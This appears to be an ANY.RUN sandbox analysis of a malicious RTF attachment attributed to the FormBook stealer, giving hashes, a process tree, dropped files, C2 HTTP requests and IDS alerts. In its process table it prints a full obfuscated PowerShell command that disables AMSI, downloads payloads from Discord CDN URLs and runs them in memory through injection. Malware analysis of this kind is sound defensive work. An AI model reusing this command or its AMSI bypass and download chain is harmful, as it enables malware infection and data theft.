Field | Value
---|---
File name | PO20200929.doc
Full analysis | https://app.any.run/tasks/23e13c17-888c-4cfe-9397-022745e94d3c
Verdict | Malicious activity
Threats | FormBook is a data stealer that is distributed as a MaaS (malware-as-a-service). FormBook differs from much of the competing malware by its extreme ease of use, which allows even inexperienced threat actors to use FormBook.
Analysis date | September 30, 2020, 06:17:36
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | text/rtf
File info | Rich Text Format data, version 1, unknown character set
MD5 | 913C3801315D0FFFD607F0CFC578FD26
SHA1 | 614C67E1939E27690984EAF27155D5A27EC8A359
SHA256 | B60E9F743293EB901A62F9F792CE8C4BB35860AE7B316118CF2FC0EED50768BB
SSDEEP | 1536:UbGarcJnbGaYfLLLLLLLLdnnndTdnnnnnWnnnnnnlnnnnnnnnnnnnfRTx0FQukn5:aG
.rtf | Rich Text Format (100)
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\PO20200929.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
184 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe |
| | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 | | | |
2892 | CmD.exe /C cscript %tmp%\vx.vbs AC | C:\Windows\system32\CmD.exe | — | EQNEDT32.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
3132 | cscript C:\Users\admin\AppData\Local\Temp\vx.vbs AC | C:\Windows\system32\cscript.exe | — | CmD.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | | |
916 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
804 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2720 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2052 | Powershell $9FB908084D324E080AAB830AC825B90C759FEEFD231824EFE18159E09E0B=@(40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,1
15,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,53,57,56,52,53,57,51,52,52,49,56,52,57,51,57,53,47,55,54,48,48,53,53,54,49,52,49,53,48,57,51,52,53,52,56,47,115,116,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,53,57,56,52,53,57,51,52,52,49,56,52,57,51,57,53,47,55,54,48,48,53,53,51,54,52,52,56,48,57,50,53,54,57,54,47,112,97,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,42,42,39,44,39,48
,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$9FB908084D324E080AAB830AC825B90C759FEEFD231824EFE18159E09E0B-join ''|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | | wmiprvse.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
1860 | "{path}" | C:\WINDOWS\system32\calc.exe | — | Powershell.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Calculator; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2816 | "C:\Windows\System32\wininit.exe" | C:\Windows\System32\wininit.exe | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Start-Up Application; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7A0C.tmp.cvr | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1M8M9WY9Q1HVCYWUGOAO.temp | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c102d2ec60b705b2801a8f0c13d50dba_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e6d91a9e84ba5e2a654e4b118a27ce31_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\6bbf59a988992657e1bf0d703d401605_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\663583b190a21dfbbf9b074ea4fb905f_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\ec42938835fa336e7158437d602b31c8_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7635b5489e8306fb7f08b1a750fd3ce7_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7754ad066ed5100fb3b5ac8519bbc89c_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\9bf03b3f463894d88ca0bcabd46a4222_90059c37-1320-41a4-b58d-2b75a9850d2f | — | — | —
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
392 | explorer.exe | GET | 302 | 23.94.150.194:80 | http://www.expressionmusicschool.com/tni/?KjwtQ=jN8uLX3ofkhq48Z1pS70elWGwkdcCsxATSq0aDjpxqSDG9jIl38AEyeS8rN8EamirxADxA==&4hD=uDzXnVxHSZclutK | US | html | 349 b | malicious |
392 | explorer.exe | GET | 404 | 212.111.215.111:80 | http://www.escierm.com/tni/?KjwtQ=9+Fdj4dAFExhuk4xWG/BUswEhRNBK7pf4yc0k8VRjp1LtuE2l85SJ7ENNPgSPnjU4fqVLg==&4hD=uDzXnVxHSZclutK | UA | html | 283 b | malicious |
392 | explorer.exe | GET | — | 192.185.46.53:80 | http://www.adsanitizing.com/tni/?KjwtQ=EYCgp5MQo5ESHoz2wbVOqOWNsC63SxmR9n8UKLmt6Zn5a9wV+AlJS/JY1a3tX+8k91iNuA==&4hD=uDzXnVxHSZclutK | US | — | — | malicious |
392 | explorer.exe | GET | — | 104.232.159.141:80 | http://www.xintianshipin.com/tni/?KjwtQ=B2QgAMbX1MAVGQCYxnJvCbs0NvQfOyXhzDa6er+w55jbP9v3OEZUsrzDtls7k7/g2c1IWw==&4hD=uDzXnVxHSZclutK | US | — | — | unknown |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.scooterhiresw.com/tni/?KjwtQ=n0ZZLkLNzLPuH1l0NJBEgJWQGUBKMkLBAZnJZBzj1GIlbsbCd3cDSQnTKQypQfxCL6BHdA==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | — | 219.94.129.222:80 | http://www.charm-cheer.com/tni/?KjwtQ=uJy5N3MXb4A8vqeASo3Z4/3ntiuMq7jbE2uVxymq+74qeva7atr8P3KoNiWpO6ffLT8GFw==&4hD=uDzXnVxHSZclutK | JP | — | — | malicious |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.santabarbaracoastrealty.com/tni/?KjwtQ=oFNWXmw9TMeY44Of+h8/XB/P2WOdTbEYyh+S4gK/yH5u/0uu/rn+N2OTAXULZMc+KmW/rw==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.hideoutparkcity.com/tni/?KjwtQ=G8IE7UXKe62F9OuCyHDHHPMLXA4FKIjF8+Mat5OrNc18bzvgvMzU5Xk5qoRSi79NdHcpYg==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | 200 | 160.124.201.54:80 | http://www.warezmoviez.com/tni/?KjwtQ=GyHA4izXPaiBqOmZJr9mOAalvMjNz3hWGDiEhFLT3b9jJnLnnYBH3+rDRbW4/b5yyHlIGQ==&4hD=uDzXnVxHSZclutK | ZA | binary | 1 b | malicious |
392 | explorer.exe | GET | 200 | 204.11.56.48:80 | http://www.scmeag.com/tni/?KjwtQ=ivd3Hw0WLcenX1n8nmxEw2CVY+qGAA4jT52jjBLsPr7UdkHskzjRYGriwAeZaKj01qQLLQ==&4hD=uDzXnVxHSZclutK | VG | html | 272 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
392 | explorer.exe | 34.102.136.180:80 | www.scooterhiresw.com | — | US | whitelisted |
2052 | Powershell.exe | 162.159.130.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
392 | explorer.exe | 23.94.150.194:80 | www.expressionmusicschool.com | ColoCrossing | US | malicious |
392 | explorer.exe | 212.111.215.111:80 | www.escierm.com | Association of users of Ukrainian Research & Academic Network URAN | UA | malicious |
392 | explorer.exe | 219.94.129.222:80 | www.charm-cheer.com | SAKURA Internet Inc. | JP | malicious |
392 | explorer.exe | 104.232.159.141:80 | www.xintianshipin.com | eSited Solutions | US | unknown |
392 | explorer.exe | 192.185.46.53:80 | www.adsanitizing.com | CyrusOne LLC | US | malicious |
392 | explorer.exe | 204.11.56.48:80 | www.scmeag.com | Confluence Networks Inc | VG | malicious |
392 | explorer.exe | 160.124.201.54:80 | www.warezmoviez.com | — | ZA | malicious |
Domain | IP | Reputation
---|---|---
google.com | | whitelisted
cdn.discordapp.com | | shared
www.expressionmusicschool.com | | malicious
www.scooterhiresw.com | | whitelisted
www.escierm.com | | unknown
www.santabarbaracoastrealty.com | | whitelisted
www.sorgse.com | | unknown
www.hideoutparkcity.com | | whitelisted
www.charm-cheer.com | | malicious
www.adsanitizing.com | | malicious
PID | Process | Class | Message |
---|---|---|---|
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |